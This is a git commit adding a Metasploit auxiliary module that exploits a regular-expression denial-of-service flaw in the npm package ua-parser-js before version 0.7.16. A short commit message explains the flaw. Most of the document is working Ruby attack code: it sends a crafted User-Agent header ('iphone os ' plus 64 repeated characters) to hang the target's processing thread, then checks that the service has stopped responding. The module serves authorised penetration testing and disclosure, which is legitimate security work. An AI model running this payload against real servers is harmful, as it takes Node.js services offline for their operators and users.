Adding ua_parser_js ReDoS Module

Nicholas Starke · Nicholas Starke · commit 306c5d20d935 · 2017-12-07T10:25:29.000-06:00
"ua-parser-js" is an npm module for parsing browser
user-agent strings.  Vulnerable version of this module
have a problematic regular expression that can be exploited
to cause the entire application processing thread to "pause"
as it tries to apply the regular expression to the input.
This is problematic for single-threaded application environments
such as nodejs.  The end result is a denial of service
condition for vulnerable applications, where no further
requests can be processed.
diff --git a/modules/auxiliary/dos/http/ua_parser_js_redos.rb b/modules/auxiliary/dos/http/ua_parser_js_redos.rb
@@ -0,0 +1,108 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Dos
+
+  def initialize
+    super(
+      'Name'           => 'ua-parser-js npm module - Regular Expression Denial of Service',
+      'Description'    => %q{
+        This module exploits a Regular Expression Denial of Service vulnerability in the npm module "ua-parser-js". Server-side applications that use "ua-parser-js" for parsing the browser user-agent string will be vulnerable if they call the "getOS" or "getResult" functions. This vulnerability was fixed as of version 0.7.16.
+      },
+      'References'     =>
+        [
+          ['CWE', '400'],
+        ],
+      'Author'         =>
+        [
+          'Ryan Knell,  Sonatype Security Research',
+          'Nick Starke, Sonatype Security Research',
+        ],
+      'License'        =>  MSF_LICENSE
+    )
+
+    register_options([
+      Opt::RPORT(80)
+    ])
+  end
+
+  def run
+    if !test_service
+      fail_with(Failure::Unreachable, "#{peer} - Could not communicate with service.")
+    else
+      trigger_redos
+      test_service_unresponsive
+    end
+  end
+
+  def trigger_redos
+    begin
+      print_status("Sending ReDoS request to #{peer}.")
+
+      res = send_request_cgi({
+        'uri' => '/',
+        'method' => 'GET',
+        'headers' => {
+          'user-agent' => 'iphone os ' + (Rex::Text.rand_text_alpha(1) * 64)
+        }
+      })
+
+      if res.nil?
+        print_status("No response received from #{peer}, service is most likely unresponsive.")
+      else
+        fail_with(Failure::Unknown, "ReDoS request unsuccessful. Received status #{res.code} from #{peer}.")
+      end
+
+    rescue ::Rex::ConnectionRefused
+      print_error("Unable to connect to #{peer}.")
+    rescue ::Timeout::Error
+      print_status("No HTTP response received from #{peer}, this indicates the payload was successful.")
+    end
+  end
+
+  def test_service_unresponsive
+    begin
+      print_status("Testing for service unresponsiveness.")
+
+      res = send_request_cgi({
+        'uri' => '/' + Rex::Text.rand_text_alpha(8),
+        'method' => 'GET'
+      })
+
+      if res.nil?
+        print_good("Service not responding.")
+      else
+        print_error("Service responded with a valid HTTP Response; ReDoS attack failed.")
+      end
+    rescue ::Rex::ConnectionRefused
+      print_error("An unknown error occurred.")
+    rescue ::Timeout::Error
+      print_good("HTTP request timed out, most likely the ReDoS attack was successful.")
+    end
+  end
+
+  def test_service
+    begin
+      print_status("Testing Service to make sure it is working.")
+
+      res = send_request_cgi({
+        'uri' => '/' + Rex::Text.rand_text_alpha(8),
+        'method' => 'GET'
+      })
+
+      if !res.nil? && (res.code == 200 || res.code == 404)
+        print_status("Test request successful, attempting to send payload")
+        return true
+      else
+        return false
+      end
+    rescue ::Rex::ConnectionRefused
+      print_error("Unable to connect to #{peer}.")
+      return false
+    end
+  end
+end
